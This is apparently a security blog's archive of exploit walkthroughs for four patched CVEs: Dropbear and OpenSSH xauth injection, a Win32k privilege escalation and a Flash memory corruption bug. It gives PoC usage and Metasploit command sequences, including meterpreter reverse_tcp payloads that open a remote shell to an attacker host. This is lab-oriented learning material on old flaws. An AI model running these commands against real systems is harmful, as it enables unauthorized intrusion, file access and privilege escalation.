Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2016-3116 Dropbear SSH forced-command and security bypass

Timeline :

Vulnerability discovered and reported to the vendor by tintinweb
Patch provided by the vendor the 2016-03-09
PoC and details provided by tintinweb the 2016-03-10

PoC provided by :

tintinweb

Reference(s) :

CVE-2016-3116

Affected version(s) :

All versions of dropbear SSH prior to 2016.72 with X11Forwarding enabled.

Tested on :

Ubuntu 15.10 with Dropbear server v2015.71

Description :

Missing sanitisation of untrusted input allows an authenticated user who is able to request X11 forwarding to inject commands to xauth.

Injection of xauth commands grants the ability to read arbitrary files under the authenticated user’s privilege, Other xauth commands allow limited information leakage, file overwrite, port probing and generally expose xauth, which was not written with a hostile user in mind, as an attack surface.

xauth is run under the user’s privilege, so this vulnerability offers no additional access to unrestricted accounts, but could circumvent key or account restrictions such as sshd_config ForceCommand, authorized_keys command=”…” or restricted shells.

Commands :

Create a shell (/bin/bash) user1:
- with ssh key or password authentication
- add a force commands in authorized_keys file, like command="whoami"

Normally only the command “whoami” will be executed when SSH authentication will be done

Create a non-shell (/bin/false) user2

Start dropbear
dropbear -R -F -E -p 2222

User provided PoC python script and connect to the vulnerable host
python poc.py <host> <port> <username> <password or path_to_privkey>
For example: python poc.py 192.168.6.146 22 user1 test

“.readfile” command allow to read files on the system
“.writefile” command allow to write files on the system

CVE-2016-3115 OpenSSH forced-command and security bypass

Timeline :

Vulnerability discovered and reported to the vendor by tintinweb
Patch provided by the vendor the 2016-03-09
PoC and details provided by tintinweb the 2016-03-10

PoC provided by :

tintinweb

Reference(s) :

CVE-2016-3115

Affected version(s) :

All versions of OpenSSH prior to 7.2p2 with X11Forwarding enabled.

Tested on :

Ubuntu 15.10 with OpenSSH_6.9p1 Ubuntu-2, OpenSSL 1.0.2d 9 Jul 2015

Description :

Missing sanitisation of untrusted input allows an authenticated user who is able to request X11 forwarding to inject commands to xauth.

Injection of xauth commands grants the ability to read arbitrary files under the authenticated user’s privilege, Other xauth commands allow limited information leakage, file overwrite, port probing and generally expose xauth, which was not written with a hostile user in mind, as an attack surface.

xauth is run under the user’s privilege, so this vulnerability offers no additional access to unrestricted accounts, but could circumvent key or account restrictions such as sshd_config ForceCommand, authorized_keys command=”…” or restricted shells.

Commands :

Create a shell (/bin/bash) user1:
- with ssh key or password authentication
- add a force commands in authorized_keys file, like command="whoami"

Normally only the command “whoami” will be executed when SSH authentication will be done

Create a non-shell (/bin/false) user2

User provided PoC python script and connect to the vulnerable host
python poc.py <host> <port> <username> <password or path_to_privkey>
For example: python poc.py 192.168.6.146 22 user1 test

“.readfile” command allow to read files on the system
“.writefile” command allow to write files on the system

CVE-2015-1701 Windows ClientCopyImage Win32k Exploit

Timeline :

Vulnerability discovered exploited in the wild by FireEye the 2015-04-13
Patch provided by the vendor via MS15-051 the 2015-05-12
PoC provided by hfiref0x the 2015-05-12
Metasploit PoC provided the 2015-06-03

PoC provided by :

Unknown
hfirefox
OJ Reeves
Spencer McIntyre

Reference(s) :

CVE-2015-1701
MS15-051

Affected version(s) :

Windows Server 2003 Service Pack 2
Windows Vista Service Pack 2
Windows Server 2008 Service Pack 2
Windows 7 Service Pack 1

Tested on :

Windows 7 SP1 (64-bit), IE8 and Adobe Flash 17.0.0.188 (CVE-2015-3105) for remote exploitation

Description :

This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.

Commands :

Remote exploitation
use exploit/multi/browser/adobe_flash_shader_drawing_fill
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid

Local privileges escalation
use exploit/windows/local/ms15_051_client_copy_image
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4445
set SESSION 1
run

getuid

CVE-2015-3105 Adobe Flash Player Drawing Fill Shader Memory Corruption

Timeline :

Vulnerability discovered and reported to the vendor by Chris Evans of Google Project Zero
Patch provided by the vendor via APSB15-11 the 2015-06-09
Vulnerability discovered exploited in the Exploit Kits the 2015-06-16
Metasploit PoC provided the 2015-06-25

PoC provided by :

Chris Evans
Unknown
juan vazquez

Reference(s) :

CVE-2015-3105
APSB15-11

Affected version(s) :

Adobe Flash Player 16.0.0.305 and earlier versions
Adobe Flash Player 11.2.202.442 and earlier 11.x versions

Tested on :

Windows 7 SP1 (64-bit), IE8 and Adobe Flash 17.0.0.188

Description :

This module exploits a memory corruption happening when applying a Shader as a drawing fill as exploited in the wild on June 2015. This module has been tested successfully on:

* Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188
* Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188
* Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.

Commands :

use exploit/multi/browser/adobe_flash_shader_drawing_fill
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo